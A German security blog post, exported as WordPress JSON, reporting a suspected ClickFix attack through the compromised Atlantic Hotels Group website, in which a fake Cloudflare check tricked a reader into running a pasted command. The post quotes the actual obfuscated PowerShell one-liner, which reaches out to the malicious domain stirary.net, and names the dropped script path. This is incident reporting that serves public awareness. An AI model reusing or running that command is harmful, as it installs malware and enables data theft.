{"id":329776,"date":"2026-09-19T12:15:51","date_gmt":"2026-09-19T10:15:51","guid":{"rendered":"https:\/\/borncity.com\/blog\/?p=329776"},"modified":"2026-09-19T23:03:23","modified_gmt":"2026-09-19T21:03:23","slug":"cybervorfall-bei-atlantic-hotel-gruppe-18-9-2026","status":"publish","type":"post","link":"https:\/\/borncity.com\/blog\/2026\/09\/19\/cybervorfall-bei-atlantic-hotel-gruppe-18-9-2026\/","title":{"rendered":"Cybervorfall bei Atlantic Hotels Gruppe (18.9.2026)?"},"content":{"rendered":"<p><img decoding=\"async\" style=\"float: left; margin: 0px 10px 0px 0px; display: inline;\" title=\"Sicherheit (Pexels, allgemeine Nutzung)\" src=\"https:\/\/borncity.com\/blog\/wp-content\/uploads\/2021\/04\/Sicherheit_klein.jpg\" alt=\"Sicherheit (Pexels, allgemeine Nutzung)\" width=\"200\" align=\"left\" \/>Bei der Atlantic Hotels Gruppe gab es mutma\u00dflich einen Cybervorfall, der zumindest das Atlantic Hotel Kiel betraf. Ein Leser hat es zuf\u00e4llig mitbekommen und mich \u00fcber seine Beobachtungen informiert. Die von mir vermutete Kompromittierung, die wohl am Freitag, den 18. September 2026 auftrat, ist vermutlich vom Betreiber bemerkt worden, da die Seite kurze Zeit offline war, und dann in den Wartungsmodus versetzt wurde.<\/p>\n<p><!--more--><\/p>\n<h2>Die Atlantic Hotels Gruppe<\/h2>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/vg09.met.vgwort.de\/na\/69dc86633f7141f7861c4344446b959b\" alt=\"\" width=\"1\" height=\"1\" \/>Die Atlantic Hotels Gruppe geh\u00f6rt der Zech Group, dessen Eigent\u00fcmer der Bremer Bauunternehmer und Investor Kurt Zech ist. Dieser begann 1990 mit dem Einstieg in Hotelprojekte. Als Teil des Baukonzerns Zech liegen bei den\u00a0<em>Atlantic Hotels<\/em> die Entwicklung, Bau, Eigentum und Betrieb <a href=\"https:\/\/www.zech-group.com\/newsroom\/artikel\/die-atlantic-hotels-gruppe-setzt-ihren-wachstumskurs-fort\/\" target=\"_blank\" rel=\"noopener\">in einer Hand<\/a>.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-329779 size-full\" title=\"Atlantic-Hotel-Kiel\" src=\"https:\/\/borncity.com\/blog\/wp-content\/uploads\/2026\/09\/Atlantic-Hotel-Kiel.jpg\" alt=\"Atlantic-Hotel-Kiel\" width=\"640\" height=\"477\" srcset=\"https:\/\/borncity.com\/blog\/wp-content\/uploads\/2026\/09\/Atlantic-Hotel-Kiel.jpg 640w, https:\/\/borncity.com\/blog\/wp-content\/uploads\/2026\/09\/Atlantic-Hotel-Kiel-300x224.jpg 300w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><br \/>\nAtlantic-Hotel-Kiel<\/p>\n<p>Laut <a href=\"https:\/\/www.hotelvor9.de\/inside\/ein-familienkonzern-baut-sich-seine-eigene-hotelwelt\" target=\"_blank\" rel=\"noopener\">diesem Artikel<\/a> sind die Atlantic Hotels mit derzeit 20 H\u00e4usern und 2.461 Zimmern ein echtes Schwergewicht im deutschen Hotelmarkt. Die Hotels sind inzwischen \u00fcber ganz Deutschland verteilt, und die Hotelgruppe will 2027 rund 150 Millionen Euro Jahresumsatz erzielen.<\/p>\n<h2>Eine Leserbeobachtung vom 18. Sept. 2026<\/h2>\n<p>Ich habe es erst versp\u00e4tet gesehen, weil die am 18. September 2026 (nach 21:00 Uhr)\u00a0 verschickten Mails von Blog-Leser Thomas B. im SPAM-Ordner gelandet waren. Tom schrieb mir unter dem Betreff <em>Hack:<\/em><\/p>\n<blockquote><p>\"Da ich Samstag in Kiel bin, habe ich mich mal nach Hotels und Gastronomie umgesehen. Dabei bin ich auf die Seite vom Atlantic Hotel Kiel gekommen.\"<\/p><\/blockquote>\n<p>Obiger Screenshot zeigt die Hotelseite, die ich aus einem Webarchiv gezogen habe (die Hotelseiten der Atlantic Hotels Gruppe sind derzeit im Wartungsmodus). Als Tom die Webseite der Atlantic Hotels Gruppe aufrufen wollte, erschien nach seiner Aussage eine \"Cloudflare-Box\", die pr\u00fcfen wollte, ob der Webseitenbesucher ein Mensch ist.<\/p>\n<p>Diese Vorschaltungen sind heute auf vielen Webseiten \u00fcblich, da denkt sich der normale Webseitenbesucher nichts dabei. Kritisch wird es aber, wenn dabei eine Aktion vom Besucher verlangt wird. Dann sollte man misstrauisch werden.<\/p>\n<h3>ClickFix-Angriff \u00fcber \"Cloudflare-Box\"<\/h3>\n<p>Tom schrieb, dass die Anweisung kam, dass f\u00fcr die Pr\u00fcfung die Tastenkombination <em>Windows<\/em>\u00a0+ <em>R<\/em> sowie danach die Tastenkombination <em>STRG<\/em> + <em>V<\/em> und dann <em>Enter<\/em> ausgef\u00fchrt werden sollte.<\/p>\n<p>Danach wurde ihm die Seite der Atlantic Hotels Gruppe mit dem Objekt in Kiel freigeben. Er konnte sich u.a. die Bar des Atlantic Deck 8 und die Speisekarte etc. ansehen. An dieser Stelle m\u00fcssten die Alarmglocken l\u00e4uten, denn da ist was nicht koscher und das Ganze tr\u00e4gt die Z\u00fcge eines ClickFix-Angriffs.<\/p>\n<blockquote><p>Bei einem ClickFix-Angriff soll das Opfer dazu gebracht werden, sch\u00e4dliche Befehle unwissentlich selbst auf dem Computer auszuf\u00fchren. Die Opfer landen unter einem Vorwand auf manipulierten Webseiten und sehen gef\u00e4lschte Fehlermeldungen, angebliche Browser-Updates oder Captchas (wie \"Ich bin kein Roboter\"). In obigem Fall war es angeblich eine Cloudflare-Box zur Pr\u00fcfung, ob ein Mensch die Seite besucht. Die besuchte Webseite kopiert unbemerkt einen Schadcode in die Zwischenablage des Nutzers (Pastejacking). Dann wird das Opfer angewiesen, eine Tastenkombination zu dr\u00fccken oder einen Befehls auszuf\u00fchren. <span class=\"iNqyIf\" data-sfc-cp=\"\" data-sfc-root=\"ep\" data-copy-service-computed-style=\"font-family: &quot;Google Sans&quot;, Arial, sans-serif, &quot;Noto Color Emoji&quot;; font-size: 16px; font-weight: 400; margin: 0px; text-decoration: none solid rgb(10, 10, 10); border-bottom: 0px none rgb(10, 10, 10);\"><span class=\"yADgie\" data-copy-service-computed-style=\"font-family: &quot;Google Sans&quot;, Arial, sans-serif, &quot;Noto Color Emoji&quot;; font-size: 16px; font-weight: 400; margin: 0px; text-decoration: none solid rgb(10, 10, 10); border-bottom: 0px none rgb(10, 10, 10);\"> Durch das Best\u00e4tigen wird ein Systemwerkzeug (wie PowerShell) gestartet, das im Hintergrund Malware wie Info-Stealer oder Remote-Access-Trojaner (RATs) installiert.<\/span><\/span><\/p><\/blockquote>\n<p>Blog-Leser Thomas hat sich das Ganze dann n\u00e4her angeschaut und dokumentiert, so dass ich die Details hier offen legen kann (danke daf\u00fcr).<\/p>\n<h3>Ungew\u00f6hnliches Verhalten des Rechners<\/h3>\n<p>Zuerst fiel dem Leser auf, dass ab und zu eine schwarze Box auf poppte. Er hat daraufhin das Dialogfeld <em>Ausf\u00fchren<\/em> \u00fcber das Startmen\u00fc aufgerufen und nachgesehen, was dort der letzte Befehl war. Dort fand er nachfolgende PowerShell-Anweisung:<\/p>\n<pre>powershell.exe -wiNdOw mini $NRgScP='Name';$cpHa=59;$Fjk = Get-Command -m 'M*.*er*.*t*y' -C 'Cm';$Fjk=$Fjk.$NRgScP;$sYxm=.$Fjk[60] stirary.net;.$Fjk[$cpHa]($sYxm);$TRTTzrXDJJNWGheKmuhPSUejsjegJelGhDYfAutkdcOeNrkxqcSWZMZOxglmOQsQHZxEDUzAlXyVBzBBjHkQuKxJUVqswIB<\/pre>\n<p>Die Anweisung ist schon nicht transparent. Er hat dann einen vollst\u00e4ndigen Scan des Defender laufen lassen, sp\u00e4ter einen Offline-Scan nachgeschoben und eine Analyse per KI\u00a0 versucht.<\/p>\n<h3>KI-Analyse w\u00e4hrend des Scans<\/h3>\n<p>Tom hat \"seiner KI\" , wie er schreibt, dann die Aufgabe erteilt, einige Analysen durchzuf\u00fchren, w\u00e4hrend nebenbei der Defender lief und scannte. Der Leser hat mir das Resultat der KI-Analyse zukommen lassen. Im PowerShell-Operational-Log tauchen laut seiner Aussage (ich habe die Eintr\u00e4ge gesehen) tats\u00e4chlich ausgef\u00fchrte PowerShell-ScriptBlocks auf, die aus folgendem Pfad stammen:<\/p>\n<pre>C:\\ProgramData\\Jinglingly\\imprisonedism.ps1<\/pre>\n<p>Das ist kein normaler Pfad f\u00fcr eine harmlose Cloudflare-Pr\u00fcfung. Die aufgezeichneten ScriptBlocks enthalten, so der Leser, au\u00dferdem umfangreichen, absichtlich verschleierten PowerShell-Code.<\/p>\n<p>\"Damit ist die Situation deutlich ernster als nur eine verd\u00e4chtige Webseite\" schrieb mir Tom, und erg\u00e4nzte \"Allerdings m\u00f6chte ich noch nicht behaupten, dass genau der vor einer Stunde eingegebene <em>stirary.net<\/em>-Befehl diese Datei angelegt hat.\"<\/p>\n<blockquote><p>Anmerkung: Bei stirary.net<!--TgQPHd|||[]--> handelt es sich um eine b\u00f6sartige Domain (Malware-Infrastruktur)<!--TgQPHd|||[]-->, die Sicherheitsanalysen zufolge f\u00fcr Cyberangriffe genutzt wird<!--TgQPHd|||[[[null,null,null,null,null,null,null,null,null,null,null,null,[247864,null,0]]]]-->.<\/p><\/blockquote>\n<p>Die EVTX-Datei enth\u00e4lt laut Leser viele ScriptBlock-Eintr\u00e4ge, und er m\u00f6chte die zeitliche Zuordnung in weiteren Analysen sauber herstellen. Aber bei der ersten schnellen Analyse der Logdatei konnte er folgendes sehen:<\/p>\n<ul>\n<li>Ein PowerShell Operational Logging ist vorhanden und es wurden ScriptBlocks protokolliert, was eine Analyse erm\u00f6glicht.<\/li>\n<li>Mehrfach wird der Pfad <em>C:\\ProgramData\\Jinglingly\\imprisonedism.ps1<\/em> angegeben.<\/li>\n<li>Der Code enth\u00e4lt zahlreiche ungew\u00f6hnliche, zuf\u00e4llig wirkende Variablennamen und absichtlich sinnlose Textbestandteile \u2013 ein typisches Merkmal von Obfuscation.<\/li>\n<li>In den aufgezeichneten Scripts finden sich auch Abfragen nach Dingen wie Benutzername, Rechnername, Windows-Version und PowerShell-Version.<\/li>\n<li>In einem Abschnitt taucht sogar <em>stirary<\/em> als Variablenbestandteil auf.<\/li>\n<\/ul>\n<p>Tom schrieb mir in seiner Folge-Mail dazu: \"Das sind gen\u00fcgend Anzeichen, dass wir den Rechner nicht einfach als sauber betrachten sollten.\". Ich w\u00fcrde mutma\u00dfen, dass er Opfer einer ClickFix-Attacke wurde.<\/p>\n<h2>Webseite der Atlantic Hotels Gruppe im Wartungsmodus<\/h2>\n<p>Der Blog-Leser erg\u00e4nzte in seiner Folge-Mail: \"Denn wenn ich jetzt wieder auf die Webseite vom Atlantic will, dann kommt folgende [Meldung]:\"<\/p>\n<blockquote><p>Service Unavailable<\/p>\n<p>The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.<\/p><\/blockquote>\n<p>Der Leser schloss die Mal mit den Worten: \"<em>Mal sehen was da rauskommt, nach dem Defender Scan werde ich noch einen Defender offline Scan durchf\u00fchren<\/em>.\"<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-329781 size-full\" title=\"Atlantic-Hotels Webseite Wartungsmodus\" src=\"https:\/\/borncity.com\/blog\/wp-content\/uploads\/2026\/09\/Atlantic-Hotels-Webseite.jpg\" alt=\"Atlantic-Hotels Webseite Wartungsmodus\" width=\"640\" height=\"438\" srcset=\"https:\/\/borncity.com\/blog\/wp-content\/uploads\/2026\/09\/Atlantic-Hotels-Webseite.jpg 640w, https:\/\/borncity.com\/blog\/wp-content\/uploads\/2026\/09\/Atlantic-Hotels-Webseite-300x205.jpg 300w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/p>\n<p>Ich habe beim Schreiben dieses Beitrags versucht, die Webseite der Atlantic Hotels Gruppe aufzurufen und bekam obige Anzeige. Ich stelle jetzt mal eine Presseanfrage an die Gruppe, um zu erfahren, ob die Vermutungen \u00fcber einen Cyberangriff zutreffen und ob es weitere Informationen gibt.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Bei der Atlantic Hotels Gruppe gab es mutma\u00dflich einen Cybervorfall, der zumindest das Atlantic Hotel Kiel betraf. Ein Leser hat es zuf\u00e4llig mitbekommen und mich \u00fcber seine Beobachtungen informiert. Die von mir vermutete Kompromittierung, die wohl am Freitag, den 18. &hellip; <a href=\"https:\/\/borncity.com\/blog\/2026\/09\/19\/cybervorfall-bei-atlantic-hotel-gruppe-18-9-2026\/\">Weiterlesen <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[908,426],"tags":[4338,4328],"class_list":["post-329776","post","type-post","status-publish","format-standard","hentry","category-internet","category-sicherheit","tag-internet","tag-sicherheit"],"_links":{"self":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/posts\/329776","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/comments?post=329776"}],"version-history":[{"count":10,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/posts\/329776\/revisions"}],"predecessor-version":[{"id":329793,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/posts\/329776\/revisions\/329793"}],"wp:attachment":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/media?parent=329776"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/categories?post=329776"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/tags?post=329776"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}